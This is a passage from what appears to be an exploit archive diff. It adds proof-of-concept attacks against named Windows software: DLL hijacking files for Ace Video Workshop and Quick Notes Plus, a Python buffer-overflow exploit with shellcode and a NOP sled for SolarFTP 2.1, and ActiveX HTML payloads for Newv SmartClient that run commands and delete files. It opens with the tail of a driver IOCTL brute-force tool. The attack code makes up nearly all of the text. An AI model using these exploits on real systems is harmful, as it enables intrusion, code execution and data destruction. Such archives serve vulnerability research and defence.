FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
memset (buf, 0, sizeof buf);
strncpy (buf, argv[1], sizeof buf - 1);
for (i = 0, j = 0; i < sizeof req.volume_buf - 4; i += 2, j++)
{
req.volume_buf[i] = buf[j];
req.volume_buf[i+1] = 0x00;
}
for (i = 0; i < SGPD_MAX_SESSION_ID; i++)
{
req.session_id = i;
result = DeviceIoControl (hFile, SGPD_UNMOUNT_IOCTL,
&req, sizeof req,
&req, sizeof req, &rlen, 0);
if (result)
{
printf ("* found, session_id: %d, volume name: %s", i, buf);
break;
}
if (!(i % 64))
{
printf ("* trying session_id: %d\r", i);
}
}
printf ("\n* done\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}

17
platforms/windows/remote/35166.c Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/45675/info
Ace Video Workshop is prone to an arbitrary-code-execution vulnerability.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Ace Video Workshop 1.2.0.0 is vulnerable; other versions may also be affected.
#include <windows.h>
#define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg();}
int pwnme()
{
MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
exit(0);
return 0;
}

19
platforms/windows/remote/35171.c Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/45689/info
Quick Notes Plus is prone to an arbitrary-code-execution vulnerability.
Attackers can exploit this vulnerability to execute arbitrary code in the context of the user running the vulnerable application.
Quick Notes Plus 5.0.0.47 is vulnerable; other versions may also be affected.
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int pwnme()
{
MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
exit(0);
return 0;
}

73
platforms/windows/remote/35188.py Executable file
View file

@ -0,0 +1,73 @@
source: http://www.securityfocus.com/bid/45748/info
SolarFTP is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
SolarFTP 2.1 is vulnerable; other versions may also be affected.
# ------------------------------------------------------------------------
# Software................Solar FTP Server 2.1
# Vulnerability...........Buffer Overflow
# Download................http://www.solarftp.com/
# Release Date............1/10/2011
# Tested On...............Windows XP SP3 EN
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A buffer overflow in Solar FTP Server 2.1 can be exploited to execute
# arbitrary code.
#
#
# --PoC--
import socket
host = 'localhost'
port = 21
jmp_eax = '\xBF\x66\x02\x10'
junk = '\xCC\xCC\xCC\xCC'
nop_sled = '\x90\x90\x90' + '\x90\x90\x90\x90' * 2
# Calc shellcode by yours truly. Check the task manager
# as the calc instance will not be visible.
shell_code = "\x31\xC9"\
"\x51"\
"\x68\x63\x61\x6C\x63"\
"\x54"\
"\xB8\xC7\x93\xC2\x77"\
"\xFF\xD0"
junk2 = 'A' * 7004
bad_stuff = junk + nop_sled + shell_code + jmp_eax * 249 + junk2
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)
print 'connecting'
s.connect((host, port))
print s.recv(8192)
s.send('USER anonymous\r\n')
print s.recv(8192)
s.send('PASS x@x.com\r\n')
print s.recv(8192)
s.send('PASV ' + bad_stuff + '\r\n')
print s.recv(8192)
s.close()

73
platforms/windows/remote/35190.html Executable file
View file

@ -0,0 +1,73 @@
source: http://www.securityfocus.com/bid/45751/info
The Newv SmartClient ActiveX control is prone to multiple insecure-method vulnerabilities and a stack-based buffer-overflow vulnerability.
Successfully exploiting these issues allows remote attackers to create or overwrite arbitrary local files, to delete arbitrary files, and to execute arbitrary code. Failed exploit attempts will result in a denial-of-service condition.
Newv SmartClient 1.1.0.0 is vulnerable; other versions may also be affected.
NewV: NewvCommon.ocx arbitrary command execution via the Runcommand attribute
POC 1:
<html>
<head>
<script language=&#039;vbscript&#039;>
arg1 = "calc.exe"
</script>
</head>
<object classid=&#039;clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9&#039; id=&#039;target&#039; />
</object>
<script language=&#039;vbscript&#039;>
target.RunCommand arg1
</script>
</html>
#####################################################################################
NewvCommon.ocx ActiveX Insecure Method Vulnerability.
POC 2:
Function DelFile (
ByVal FilePath As Variant
) As String
<html>
<head>
<script language=&#039;vbscript&#039;>
arg1 = "c:\\test.txt"
</script>
</head>
<object classid=&#039;clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9&#039; id=&#039;target&#039; />
</object>
<script language=&#039;vbscript&#039;>
target.DelFile arg1
</script>
</html>
########################################################################################
NewvCommon.ocx ActiveX Stack-Based Buffer Overflow Vulnerability
POC 2:
Function WriteTextFile (
ByVal str As Variant ,
ByVal FilePath As Variant
) As String
0:000> g
(d2c.f84): Unknown exception - code 0eedfade (first chance)
(d2c.f84): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000
eip=41414141 esp=0013d8c8 ebp=0013d8e8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
<Unloaded_na.dll>+0x41414140:
41414141 ?? ???